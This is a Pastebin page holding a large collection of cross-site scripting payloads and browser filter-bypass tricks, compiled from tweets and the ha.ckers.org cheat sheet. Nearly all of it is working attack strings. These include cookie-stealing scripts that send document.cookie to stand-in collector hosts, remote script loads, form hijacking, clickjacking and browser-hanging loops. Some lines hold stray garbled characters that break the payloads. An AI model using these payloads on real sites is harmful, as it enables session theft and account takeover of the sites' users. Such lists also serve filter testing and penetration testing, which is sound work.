Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- http://iwantaneff.in/bin/view/raw/ac7d7f67
- ▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀
- XSS VECTOR COLLECTION GATHERED FROM VARIOUS SOURCES. COMPILED BY DAVID HIGGINS
- ▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀
- STANDARD XSS VECTORS:
- < script > < / script>
- <
- <
- <
- <
- <
- <<
- <<<
- "><script>"
- <script>alert("XSS")</script>
- <<script>alert("XSS");//<</script>
- <script>alert(document.cookie)</script>
- '><script>alert(document.cookie)</script>
- '><script>alert(document.cookie);</script>
- ";alert('XSS');//
- %3cscript%3ealert("XSS");%3c/script%3e
- %3cscript%3ealert(document.cookie);%3c%2fscript%3e
- %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
- <script>alert(document.cookie);</script>
- <script>alert(document.cookie);<script>alert
- <xss><script>alert('XSS')</script></vulnerable>
- <IMG%20SRC='javascript:alert(document.cookie)'>
- <IMG SRC="javascript:alert('XSS');">
- <IMG SRC="javascript:alert('XSS')"
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=JaVaScRiPt:alert('XSS')>
- <IMG SRC=javascript:alert("XSS")>
- <IMG SRC=`javascript:alert("'XSS'")`>
- <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG%20SRC='javasc ript:alert(document.cookie)'>
- <IMG SRC="jav ascript:alert('XSS');">
- <IMG SRC="jav	ascript:alert('XSS');">
- <IMG SRC="jav
ascript:alert('XSS');">
- <IMG SRC="jav
ascript:alert('XSS');">
- <IMG SRC="  javascript:alert('XSS');">
- <IMG DYNSRC="javascript:alert('XSS')">
- <IMG LOWSRC="javascript:alert('XSS')">
- <IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=javascript:alert('XSS')>
- '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
- "><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'皇⺙.cookie</script>
- %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
- '';!--"<XSS>=&{()}
- <name>','')); phpinfo(); exit;/*</name>
- <![CDATA[<script>var n=0;while(true){n;}</script>]]>
- <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
- <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
- <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
- <xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- ▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉
- TWITTER @xssvector Tweets:
- <img language=vbs src=<b onerror=alert#1/1#>
- Opera cross-domain set cookie 0day: document.cookie='xss=jackmasa;domain=.me.'
- Reverse 401 basic auth phishing by @jackmasa POC:
- document.domain='com' chrome/safari same domain suffix cross-domain trick.
- Safari empty location bar bug by @jackmasa POC:
- Safari location object pollution tech: by @kinugawamasato
- Safari URL spoofing about://mmme.me POC:
- Opera URL spoofing vuln data://mmme.me by @jackmasa POC:
- Universal URL spoofing data:;//mmme.me/view/1#1,2 #firefox #safari #opera
- New dom xss vector xxx.innerHTML=document.title by @0x6D6172696F
- Opera data:message/rfc822 #XSS by @insertScript
- #IE <iframe><iframe src=javascript:alert(/@jackmasa/)></iframe>
- IE cool expression xss <div id="alert(/@0x6D6172696F/)" style="x:expression(eval)(id)">
- Clever webkit xss auditor bypass trick <script늷=data:,alert(1)<!-- by @cgvwzq
- Bypass IE8 version flash docuemnt object protection by @jackmasa
- Bypass IE all version flash docuemnt object protection by @gainover1
- Bypass IE9 flash docuemnt object protection by @irsdl
- Bypass IE8 flash docuemnt object protection by @irsdl
- New XSS vector (#Opera Specific) <sVg><scRipt >prompt(/@soaj1664ashar/)
- IE xss filter bypass 0day : <xml:namespace prefix=t><import namespace=t implementation=..... by @gainover1 #IE #0day
- <iframe srcdoc='<svg/onload=alert(/@80vul/)>'> #chrome
- IE xss filter bypass 0day :<script/v>alert(/@jackmasa/)</script> and %c0″//(0000%0dalert(1)// #IE #0day
- new XMLHttpRequest().open("GET", "data:text/html,<svg onload=alert(/@irsdl/)></svg>", false); #firefox #datauri
- <h1 onerror=alert(/@0x6D6172696F/)>XSS</h1><style>*:after{content:url()}</style> #firefox
- <script for=_ event=onerror()>alert(/@ma1/)</script><img id=_ src=> #IE
- "<a href=javascript&.x3A;alert&(x28;1&)x29;//=>clickme #IE #xssfilter @kinugawamasato
- Components.lookupMethod(self, 'alert')(1) #firefox
- external.NavigateAndFind(' ',[],[]) #IE #URLredirect
- <?php header('content-type:text/html;charset=utf-7-utf-8-shift_jis');?> IE decides charset as #utf-7 @hasegawayosuke
- <meta http-equiv=refresh content="0 javascript:alert(1)"> #opera
- <meta http-equiv=refresh content="퇭,javascript:alert(1)"> #chrome
- <svg contentScriptType=text/vbs><script>MsgBox"@insertScript"<i> #IE9 #svg #vbscript
- setTimeout(['alert(/@garethheyes/)']); #chrome #safari #firefox
- <svg></ y="><x" onload=alert('@0x6D6172696F')> #svg
- Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert #webkit #opera
- URL-redirect vuln == XSS ! Location:data:text/html,<svg/onload=alert(document.domain)> #Opera @jackmasa
- <a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a> #Chrome #XSS @RSnake
- Clipboard-hijack without script and css: http://<bdo dir=rtl>elgoog</bdo>.com
- Opera:<style>*{-o-link:'data:text/html,<svg/onload=alert(/@garethheyes/)>';-o-link-source:current}</style><a href=1>aaa
- $=<>@mozilla.org/js/function</>;$::[<>alert</>](/@superevr/) #firefox
- Firefox cookie xss: with(document)cookie='∼≩≭≧∯≳≲≣∽≸≸∺≸∠≯≮≥≲≲≯≲∽≡≬≥≲≴∨∱∩∾',write(cookie); by @jackmasa
- <svg><script>location=<>javascript&#x3A;alert(1)<!/></script> #Firefox #JustForFun
- Just don't support IE <a href=[0x0b]" onclick=alert(1)//">click</a>
- <style>//<!--</style> -->*{x:expression(alert(/@jackmasa/))}//<style></style>
- <!-- --!><input value="--><body/onload=`alert(/ @jackmasa /)//`"> #IE #XSS
- Input[hidden] XSS <input type=hidden style=`x:expression(alert(/ @garethheyes /))`> target it.
- Firefox clipboard-hijack without script and css : http://<img alt="evil/#" width=0 height=0 >
- <![<img src=x:x onerror=`alert(/ @jackmasa /)//`]-->
- #E4X <{alert(1)}></{alert(2)}>.(alert(3)).@wtf.(wtf) by @garethheyes
- #vbscript coool feature chr(&H4141)="A", Chr(7^5)=A and Chr(&O41) =‘A’ by @masa141421356
- ({})[$='\143\157\156\163\164\162\165\143\164\157\162'][$]('\141\154\145\162\164\50/ @0x6D6172696F /\51')()
- No referer : <iframe src="javascript:'<script src=>;</script>'"></iframe>
- <svg><script>/**/alert(' @0x6D6172696F ')//*/</script></svg>
- #VBScript Event Handling: [Sub XXX_OnError MsgBox " @0x6D6172696F " End Sub]
- if(1)alert(' @jackmasa ')}{ works in firebug and webkit's console
- <svg><script onlypossibleinopera:-)> alert(1) #opera by @soaj1664ashar
- <![if<iframe/onload=vbs::alert[:]> #IE by @0x6D6172696F, @jackmasa
- <svg><script/XL:href= data:;;;base64;;;;,<>啊YWx啊lc啊nQ啊oMSk啊=> mix! #opera by @jackmasa
- <! XSS="><img src=xx:x onerror=alert(1)//"> #Firefox #Opera #Chrome #Safari #XSS
- document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=alert(1)>') #IE #XSS
- header('Refresh: 0;url=javascript:alert(1)');
- <script language=vbs></script><img src=xx:x onerror="::alert' @insertScript '::">
- <a href="data:text/html,<script>eval(name)</script>" target="alert(' @garethheyes @0x6D6172696F ')">click</a>
- #CSS expression <style>*{font-family:'Serif}';x[value=expression(alert(URL=1));]{color:red}</style>
- #ES #FF for(location of ['javascript:alert(/ff/)']);
- #E4X function::['location']='javascript'':alert(/FF/)'
- HTML5 entity char <a href="javas	cri
pt:alert(' @garethheyes ')">test</a>
- #Firefox <a href="x:alert(1)" id="test">click</a> <script>eval(test'')</script> by @cgvwzq
- <div style="color:rgb(''�x:expression(alert(URL=1))"></div> CSS and CSS :P
- toUpperCase XSS document.write('<ı onclıck=alert(1)>asd</ı>'.toUpperCase()) by @jackmasa
- IE6-8,IE9(quick mode) with jQuery<1.7 $("button").val("<iframe src=vbscript:alert(1)>") by @masa141421356
- aha <script src=>alert(/IE|Opera/)</script>
- Opera bug? <img src=//\ onload=alert(1)>
- Use 127.1 no 127.0.0.1 by @jackmasa
- IE vector location='vbscript:alert(1)'
- #jQuery super less-xss,work in IE: $(URL) 6 chars
- #Bootstrap tooltip.js xss some other plugins (e.g typeahead,popover) are also the same problem //cc @twbootstrap
- innerText DOM XSS: innerHTML=innerText
- Using IE XSS filter or Chrome xss auditor to block <meta> url redirect.
- jQuery 1.8 a new method: $.parseHTML('<img src=xx:X onerror=alert(1)>')
- IE all version CSRF vector <img lowsrc=//google.com>
- Timing vector <img src=//ixss.sinaapp.com/sleep.php>
- Firefox data uri can inherit dom-access. <iframe src="data:D,<script>alert(top.document.body.innerHTML)</script>">
- IE9 <script/onload=alert(1)></script>
- Webkit and FF <style/onload=alert(1)>
- Firefox E4X vector alert(<xss>xs{[function::status]}s</xss>) it is said E4H would replace E4X :P
- IE8 document.write('<img src="<iframe/onload=alert(1)>\0">')
- If you want to share your cool vector, please do not hesitate to let me know :)
- ASP trick: ?input1=<script/&in%u2119ut1=>al%u0117rt('1')</script> by @IRSDL
- New spec:<iframe srcdoc="<svg/onload=alert(domain)>"> #chrome 20 by @0x6D6172696F
- #Firefox syntax broken try{*}catch(e if(alert(1))){} by @garethheyes
- JSON XSS Tips: /json.cgi?a.html by @hasegawayosuke
- JSON XSS Tips: /json/.html with PHP and .NET by or /json;.html with JSP by @superevr
- ß=ss <a href="http://ß.lv">click</a> by @_cweb
- <a href="http://www。example。com">click</a> by @_cweb
- Firefox link host dom xss https://t.co/aTtzHaaG by @garethheyes
- <a href="http://www﹒example﹒com ">click</a> by @_cweb
- history.pushState([],[],'/xssvector') HTML5 URL spoofing!
- Clickjacking with history.forward() and history.back() by @lcamtuf
- Inertia-Clickjacking for(i=10;i>1;i--)alert(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true); by @80vul
- XHTML Entity Hijacking [<!ENTITY nbsp "'">] by @masa141421356
- Firefox <img src=javascript:while([{}]);>
- IE <!--[if<img src=x:x onerror=alert(5)//]--> by @0x6D6172696F H5SC#115
- Firefox funny vector for(i=0;i<100;) find(); by @garethheyes
- IE breaking framebusting vector <script>var location={};</script>
- IE JSON hijack with UTF-7 json={'x':'',x:location='1'} <script src=... charset=utf-7></script>
- Firefox <iframe src=view-source://xxxx.com>; with drag and drop
- <button form=hijack_form_id formaction=//evil style="position:absolute;left:0;top:0;width:100%;height:100%"><plaintext> form hijacking
- Dangling markup injection <img src='//evil by @lcamtuf
- Webkit <iframe> viewsource attribute: // <iframe viewsource src="//test.de"></iframe> by @0x6D6172696F
- DOM clobbering:<form name=location > clobbered location object on IE.
- DOM clobbering:<form name=document><image name=body> clobbered document->body
- <isindex formaction=javascript:alert(1)> by @jackmasa
- Classic IE backtick DOM XSS: <img src="xx:x" alt="``onerror=alert(1)"><script>document.body.innerHTML=''</script>
- Firefox <a href="https://4294967298915183000">click</a>=>google by @garethheyes
- <a href="data:text/html;base64xoxoxox,<body/onload=alert(1)>">click</a> by @kkotowicz
- Opera <a href="data:text/html;base64,PHN2Zy萨9vbmxv晕YWQ<>>9YWxlc>>>nQoMSk">click</a> variant base64 encode. by @jackmasa
- Opera <svg><image x:href="data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"> by LeverOne H5SC#88
- Webkit and Opera <a href="\/www.google.com/favicon.ico">click</a> by @kkotowicz
- FF <a href="//ⓜⓜⓜⓔ︒ⓜⓔ">click</a> url trick by @jackmasa
- IE <script>-{valueOf:location,toString:[].pop,0:'vbscript:alert%281%29',length:1}</script> @thornmaker , @sirdarckcat
- <i/onclick=URL=name> IE less xss,20 chars. by @0x6D6172696F
- <a rel="noreferrer" href="//google.com">click</a> no referrer by @sneak_
- FF <img src="jar:!/"> no referrer by @sneak_
- No dos expression vector <i style=x:expression(alert(URL=1))> by @jackmasa
- <svg><style>*{font-family:'<svg onload=alert(1)>';}</style></svg> by @0x6D6172696F
- JSLR( @garethheyes ) challenge result:
- @irsdl challenge result:
- <body onload='vbs:Set x=CreateObject("Msxml2.XMLHTTP"):x.open"GET",".":x.send:MsgBox(x.responseText)'> Vbscript XHR by @masa141421356
- XML Entity XSS by @garethheyes
- Webkit <svg/onload=domain=id> cross-domain and less vector! example: (JSFiddle cross to JSBin) by @jackmasa
- <style>@import//evil? >>>steal me!<<< scriptless by @garethheyes
- IE <input value="<script>alert(1)</script>" ` /> by @hasegawayosuke
- <xmp><img alt="</xmp><img src=xx:x onerror=alert(1)//"> Classic vector by slacker :D
- <a href="#" onclick="alert(' ');alert(2 ')">name</a> Classic html entity inject vector
- A nice opera xss: Put 65535 Bytes before and Unicode Sign by @insertScript
- <iframe src="jar://html5sec.org/test.jar!/test.html"></iframe> Upload a jar file => Firefox XSS by @0x6D6172696F
- JS Array Hijacking with MBCS encodings ppt by @hasegawayosuke
- <meta http-equiv="refresh" content="0;url=http://good/[>>>inj];url=http://evil/[<<<inj]"> IE6-7 Inject vector by @kinugawamasato
- IE UTF7 BOM XSS <link rel=stylesheet href='data:,*%7bx:expression(alert(1))%7D' > by @garethheyes
- <svg><script>a='<svg/onload=alert(1)></svg>';alert(2)</script> by @0x6D6172696F , @jackmasa
- Opera <svg><animation x:href=javascript:alert(1)> SVG animation vector by @0x6D6172696F
- <meta charset=gbk><script>a='xࠄ\';alert(1)//';</script> by @garethheyes
- FF <a href="data:),< s c r i p t > a l e r t ( document.domain ) < / s c r i p t >">CLICK</a> by @0x6D6172696F
- <noscript><!--</noscript><img src=xx:x onerror=alert(1) --> non-IE
- <svg><script xlink:href="data:,alert(1)"> by @0x6D6172696F
- Firefox statusline spoofing<math><maction actiontype="statusline#http://google.com" href="//evil">click by LeverOne
- <svg><oooooo/oooooooooo/onload=alert(1) > by @jackmasa
- <math><script>sgl='<img/src=xx:x onerror=alert(1)>'</script> chrome firefox opera vector by @jackmasa
- FF <applet code=javascript:alert('sgl')> by @jackmasa
- Nice IE DOM XSS: <div id=d><x xmlns="><body onload=alert(1)"><script>d.innerHTML=‘’</script> by LeverOne
- <script>RuntimeObject("w*")["window"]["alert"](1);</script> IE a new method get window object! by @s_hskz
- <body onload="$})}}}});alert(1);({0:{0:{0:function(){0({"> Chrome crazy vector! by @cgvwzq
- IE <!-- `<img/src=xx:xx onerror=alert(1)//--!> by @jackmasa H5SC:
- <a href="javascript:alert(1)">click</a> non-IE
- <a href="feed:javascript:alert(1)">click</a> Firefox
- <link href="javascript:alert(1)" rel="next"> Opera, pressing the spacebar execute! by @shafigullin
- <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> works on webkit by @garethheyes
- ▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉
- MORE VECTORS:
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- "><script>alert(0)</script>
- <script src=http://yoursite.com/your_files.js></script>
- </title><script>alert(/xss/)</script>
- </textarea><script>alert(/xss/)</script>
- <IMG LOWSRC="javascript:alert('XSS')">
- <IMG DYNSRC="javascript:alert('XSS')">
- <font style='color:expression(alert(document.cookie))'>
- <img src="javascript:alert('XSS')">
- <script language="JavaScript">alert('XSS')</script>
- [url=javascript:alert('XSS');]click me[/url]
- <body onunload="javascript:alert('XSS');">
- <script>alert(1);</script>
- <script>alert('XSS');</script>
- <script src="http://www.evilsite.org/cookiegrabber.php"></script>
- <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="竇᪥(document.cookie)</script>
- <scr<script>ipt>alert('XSS');</scr</script>ipt>
- <script>alert(String.fromCharCode(88,83,83))</script>
- <img src=foo.png onerror=alert(/xssed/) />
- <style>@import'javascript:alert("XSS")';</style>
- <? echo('<scr)'; echo('ipt>alert("XSS")</script>'); ?>
- <marquee><script>alert('XSS')</script></marquee>
- <IMG SRC="jav	ascript:alert('XSS');">
- <IMG SRC="jav
ascript:alert('XSS');">
- <IMG SRC="jav
ascript:alert('XSS');
- <body onLoad="alert('XSS');"
- [color=red' onmouseover="alert('xss')"]mouse over[/color]
- "/></a></><img src=1.gif onerror=alert(1)>
- window.alert("Bonjour !");
- <div style="x:expression((window.r==1)?'':eval('r=1;
- alert(String.fromCharCode(88,83,83));'))">
- <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
- "><script alert(String.fromCharCode(88,83,83))</script>
- '>><marquee><h1>XSS</h1></marquee>
- '">><script>alert('XSS')</script>
- '">><marquee><h1>XSS</h1></marquee>
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
- <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
- <script>var var = 1; alert(var)</script>
- <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
- <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
- <IMG SRC='vbscript:msgbox("XSS")'>
- " onfocus=alert(document.domain) "> <"
- <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
- <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
- perl -e 'print "<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
- perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";' > out
- <br size="&{alert('XSS')}">
- <scrscriptipt>alert(1)</scrscriptipt>
- </br style=a:expression(alert())>
- </script><script>alert(1)</script>
- <SCRIPT>document.write("XSS");</SCRIPT>
- a="get";b="URL";c="javascript:";d="alert('xss');";eval(a濧);
- ='><script>alert("xss")</script>
- <isindex action="javas	cript:alert(1)" type=image>
- <script늷=">"늷="http://yoursite.com/xss.js?69,69"></script>
- <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
- ">/XaDoS/><script>alert(document.cookie)</script>
- <script> src="http://www.site.com/XSS.js"></script>
- ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
- src="http://www.site.com/XSS.js"></script>
- "><BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("XSS")>
- [color=red width=expression(alert(123))][color]
- <BASE HREF="javascript:alert('XSS');//">
- Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
- "></iframe><script>alert(123)</script>
- <body onLoad="while(true) alert('XSS');">
- '"></title><script>alert(1111)</script>
- </textarea>'"><script>alert(document.cookie)</script>
- '""><script language="JavaScript"> alert('X nS nS');</script>
- </script></script><<<<script><>>>><<<script>alert(123)</script>
- <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
- '></select><script>alert(123)</script>
- '>"><script src = 'http://www.site.com/XSS.js'></script>
- }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
- <html><noalert><noscript>(123)</noscript><script>(123)</script>
- <IMG SRC=JaVaScRiPt:alert('XSS')>
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC="javascript:alert('XSS');">
- <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
- <IMG SRC="jav ascript:alert('XSS');">
- <IMG SRC="jav	ascript:alert('XSS');">
- <IMG SRC="jav
ascript:alert('XSS');">
- <IMG SRC="jav
ascript:alert('XSS');">
- <BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("XSS")>
- <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <<SCRIPT>alert("XSS");//<</SCRIPT>
- <SCRIPT SRC=//ha.ckers.org/.j>
- <IMG SRC="javascript:alert('XSS')"
- <iframe src=http://ha.ckers.org/scriptlet.html <
- ";alert('XSS');//
- </TITLE><SCRIPT>alert("XSS");</SCRIPT>
- <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
- <BODY BACKGROUND="javascript:alert('XSS')">
- <IMG DYNSRC="javascript:alert('XSS')">
- <IMG LOWSRC="javascript:alert('XSS')">
- <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
- <IMG SRC='vbscript:msgbox("XSS")'>
- <IMG SRC="livescript:[code]">
- <BODY ONLOAD=alert('XSS')>
- <BGSOUND SRC="javascript:alert('XSS');">
- <BR SIZE="&{alert('XSS')}">
- <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
- <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
- <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
- <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
- <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
- <STYLE>@import'javascript:alert("XSS")';</STYLE>
- <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
- <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
- <XSS STYLE="xss:expression(alert('XSS'))">
- <XSS STYLE="behavior: url(xss.htc);">
- <a <!-- --> href="javascript:alert(-1)">hello</a>
- <a href="javascript:alert(-1)"
- <a href="javascript:alert%252831337%2529">Hello</a>
- <a <!-- href="javascript:alert(31337);">Hello</a>
- <img src="http://www.w3schools.com/tags/planets.gif" width="145" height="126" alt="Planets" usemap="#planetmap"><map name="planetmap"><area shape="rect" coords="0,0,145,126" a-=">" href="javascript:alert(-1)"></map>
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=javascript:alert('XSS')>
- " onhover="javascript:alert(-1)"
- "><script>alert('test')</script>
- ▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉
- ha.ckers.org / sla.ckers.org
- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>--!><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
- <IMG SRC="javascript:alert('XSS');">
- <IMG SRC=JaVaScRiPt:alert('XSS')>
- <IMG SRC=javascript:alert("XSS")>
- <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
- <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC="jav ascript:alert('XSS');">
- <IMG SRC="jav	ascript:alert('XSS');">
- <IMG SRC="jav
ascript:alert('XSS');">
- <IMG SRC="jav
ascript:alert('XSS');">
- <IMG
- SRC
- =
- "
- j
- a
- v
- a
- s
- c
- r
- i
- p
- t
- :
- a
- l
- e
- r
- t
- (
- '
- X
- S
- S
- '
- )
- "
- >
- <IMG SRC="  javascript:alert('XSS');">
- <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <BODY onload!#$%&()*~+_.,:;?@[/|\]^`=alert("XSS")>
- <<SCRIPT>alert("XSS");//<</SCRIPT>
- <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
- <SCRIPT SRC=//ha.ckers.org/.j>
- <IMG SRC="javascript:alert('XSS')"
- <iframe src=http://ha.ckers.org/scriptlet.html <
- <SCRIPT>a=/XSS/
- alert(a.source)</SCRIPT>
- ";alert('XSS');//
- </TITLE><SCRIPT>alert("XSS");</SCRIPT>
- <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
- <BODY BACKGROUND="javascript:alert('XSS')">
- <BODY ONLOAD=alert('XSS')>
- <IMG DYNSRC="javascript:alert('XSS')">
- <IMG LOWSRC="javascript:alert('XSS')">
- <BGSOUND SRC="javascript:alert('XSS');">
- <BR SIZE="&{alert('XSS')}">
- <LAYER SRC="http://ha.ckers.org/
- scriptlet.html"></LAYER>
- <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
- <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
- <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
- <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
- <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
- <XSS STYLE="behavior: url(xss.htc);">
- <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
- <IMG SRC='vbscript:msgbox("XSS")'>
- <IMG SRC="mocha:[code]">
- <IMG SRC="livescript:[code]">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
- <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
- <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
- <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
- <TABLE BACKGROUND="javascript:alert('XSS')">
- <TABLE><TD BACKGROUND="javascript:alert('XSS')">
- <DIV STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
- <DIV STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV STYLE="width: expression(alert('XSS'));">
- <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
- <IMG STYLE="xss:expr/*XSS*ession(alert('XSS'))">
- <XSS STYLE="xss:expression(alert('XSS'))">
- exp/*<A STYLE='no\xss:noxss("**");
- xss:ex/*XSS*//**pression(alert("XSS"))'>
- <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
- <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
- <!--[if gte IE 4]>
- <SCRIPT>alert('XSS');</SCRIPT>
- <![endif]-->
- <BASE HREF="javascript:alert('XSS');//">
- <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
- <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
- <HTML xmlns:xss>
- <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
- <xss:xss>XSS</xss:xss>
- </HTML>
- <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
- </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
- <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
- <XML SRC="xsstest.xml" ID=I></XML>
- <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <HTML><BODY>
- <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
- <?import namespace="t" implementation="#default#time2">
- <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
- </BODY></HTML>
- <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
- <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD><SCRIPT>alert('XSS');</SCRIPT>
